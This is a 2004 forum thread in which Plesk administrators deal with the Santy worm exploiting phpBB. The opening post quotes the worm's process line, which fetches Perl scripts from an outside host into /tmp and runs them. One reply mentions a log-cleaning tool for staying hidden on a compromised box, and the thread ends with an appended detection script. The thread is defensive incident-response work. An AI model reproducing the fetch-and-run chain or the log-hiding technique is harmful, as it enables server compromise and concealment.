
Worm problem with apache 2.0.8

Discussion in 'Plesk for Linux - 8.x and Older' started by trec, Dec 26, 2004.

  1. trec

    I am having some strange processes:

    apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
    apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
    apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy

    and there are several of the last one: httpd - spy

    It seems to be a worm; in /tmp there are several .txt files.

    any clue on how to remove it?
     
  2. ptheborg

    Seems to be Santy. Are you running phpBB?

    You have to kill all httpd processes and restart apache. Remove all files in /tmp.

    Upgrade phpBB to the latest version. Upgrade PHP (Plesk 7.5.1) to be sure to have many security bugs fixed.
     
  3. lvalics

  4. trec

    Thanks ptheborg and lvalics for the info; that's precisely the worm I have. The problem is I have several sites using phpBB (about 7) and others using PHPNuke, so disabling phpBB or PHP applications is not an option for me right now.

    How can I secure the /tmp folder so that it is not executable?
    Would this affect any other software or function?

    I will be upgrading to Plesk 7.5.1 later today and would also like to make the correct changes to /tmp.
     
  5. lvalics

  6. aswitzer

    Has anyone figured out how to completely stop these intrusions?

    I've upgraded PHP to 4.3.10, upgraded all phpBBs on my server to 2.0.11, and followed most of the steps (i.e. securing /tmp and renaming wget) that lvalics detailed on his site. (Thanks lvalics)

    Still, every few hours my /tmp is full of random files that contain perl scripts or lists of phpBB sites that someone is scanning for using my server.

    I've searched through google.com and I can't figure out what I am missing. How are they still getting in?
     
  7. NightStorm

    Checked into mod_security yet?
    Short of a complete reimage of the server, about all you can do is ensure that commands that can exploit the PHP bug cannot be executed at all.
     
  8. lvalics

    Sounds bad.
    It could be, for example, that the attacker is already in the system. Then it will be hard or almost impossible to kick him out, and it may (only maybe) require a full reinstall.
    There are several ways to find out if they are inside, but it is too long to write down here. I will try to point out some ideas, but whether you can fight it or not depends on your Linux skills.

    1. If a BNC or some other program is already installed and he is already a root user, I suggest acting like you don't know about him for 1-2 days, and doing a backup and saving it somewhere on another server (psadump). This is in case he observes you and tries to delete things and the server crashes; you need a full backup.

    2. Try to see what scripts he installs, how each script acts and where it installs itself. It is not easy, because if this user is smart, then it is hard to find out; he deletes all logs, all clues.
    We have a program that we use to hide ourselves in these cases, and we stay alerted when he logs in, to watch what he does.
    This small perl script mig_logcleaner (which he probably uses as well, or something similar) will hide you; he cannot see that you are logged in and he will work like no one is on the server.
    You can watch what he does (reading root or user bash history before he deletes it).

    3. Try to install chkrootkit (only after you have done point 1, full backup) and try to find the worm.

    4. Try to run different commands like ps or netstat and try to see if you can find any anomalies in the processes; for example, with netstat you can see something like port - or port 6 used, or things which are not normal.
    It is not easy to find them.

    5. The last thing is to reinstall the OS (clean install) and restore PLESK.

    If you are not hacked already, then you need to find out where, in which apache log, he tries to write.
    You can try to use tcpdump to see where these attacks come from; you can also try to look at the apache logs, but it is almost impossible to see it all if you have over 10 domains.

    Maybe a nice idea for PLESK would be to not log only to a directory for each user, but to log also for admin in one log for all domains. I don't know if it's possible, but as admin I would always like to have the possibility to see the logs for all domains in one file, to look where a problem can be, instead of searching in all ...

    Hope this helps.
     
  9. JLChafardet

    It may not fix all the holes, but take a look at

    http://eth0.us

    He has posted a mod_security how-to that blocks some issues with phpBB, allowing you to keep phpBB on your servers. It may not be the most complete ruleset, but it works! I have tested it on my test box and production box and it works.

    Regards,
     
  10. Bobby

    Hi,

    AFAIK the worm does not work if PHP safe_mode is activated ...

    Did you activate PHP safe_mode globally?

    Regards,

    Bobby
     
  11. nickpick

    wget

    I didn't read this entire forum, but this issue was spoken about in another thread:
    http://forum.plesk.com/showthread.php?s=&postid=91894

    The easiest and quickest way to prevent sites from downloading the trojans is to simply rename your wget command to something else. Then they won't be able to use this command at all and cannot download the trojans.

    This worked for me, but of course it is not a definitive solution. It just saves you a lot of trouble right away.
     
  12. lvalics

    Or you can chmod 700 wget and it should work as well.
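    Two defender-side checks, as an added example that is not part of any post in this thread, tying together the indicators discussed above: trec's ps output (the apache user running a "cd /tmp; wget; perl" chain and the renamed "httpd - spy" entries), the noexec /tmp that trec asks about, and the wget-disabling advice that follows from it. It assumes the web-server user is "apache", as in the pasted output; the sample ps and mount lines are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread. Two defender-side checks for the
# Santy-style pattern pasted by the original poster:
#  1. scan `ps aux`-style lines for the web-server user spawning
#     "cd /tmp; wget ...; perl ..." chains, or an httpd whose argv was
#     rewritten ("httpd - spy");
#  2. verify that a /tmp mount line carries noexec and nosuid.
# WEB_USER defaults to "apache", the user shown in the post (assumption).

WEB_USER="${WEB_USER:-apache}"

# Reads ps lines on stdin; prints one "REASON: command" line per hit.
flag_suspicious_procs() {
    while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{print $1}')
        [ "$user" = "$WEB_USER" ] || continue
        # columns 11.. of ps aux are the command line
        cmd=$(printf '%s\n' "$line" | awk '{for(i=11;i<=NF;i++) printf "%s%s",$i,(i<NF?" ":"\n")}')
        case "$cmd" in
            *"cd /tmp"*wget*|*"cd /tmp"*perl*) echo "DOWNLOAD-AND-RUN: $cmd" ;;
            "wget "*|"perl "*)                 echo "WEB-USER-FETCH-OR-INTERP: $cmd" ;;
            *"httpd - "*)                      echo "RENAMED-HTTPD-ARGV: $cmd" ;;
        esac
    done
}

# Number of flagged lines (reads stdin).
count_suspicious_procs() {
    flag_suspicious_procs | wc -l | tr -d ' '
}

# Returns 0 when a /proc/mounts-style line mounts /tmp with noexec and nosuid.
tmp_mount_hardened() {
    opts=$(printf '%s\n' "$1" | awk '$2=="/tmp"{print $4}')
    case ",$opts," in
        *,noexec,*) case ",$opts," in *,nosuid,*) return 0 ;; esac ;;
    esac
    return 1
}

# Constructed sample: the three lines from the post plus two benign ones.
SAMPLE_PS='apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;perl spybot.txt
apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy
apache 620 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd -DSSL
root 1 0.0 0.0 1500 500 ? S 02:00 0:01 init'

printf '%s\n' "$SAMPLE_PS" | flag_suspicious_procs
```

    On a live box, feed it "ps aux" and the /tmp line from /proc/mounts instead of the constructed sample; the legitimate "httpd -DSSL" line and the root-owned init line are not flagged.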
     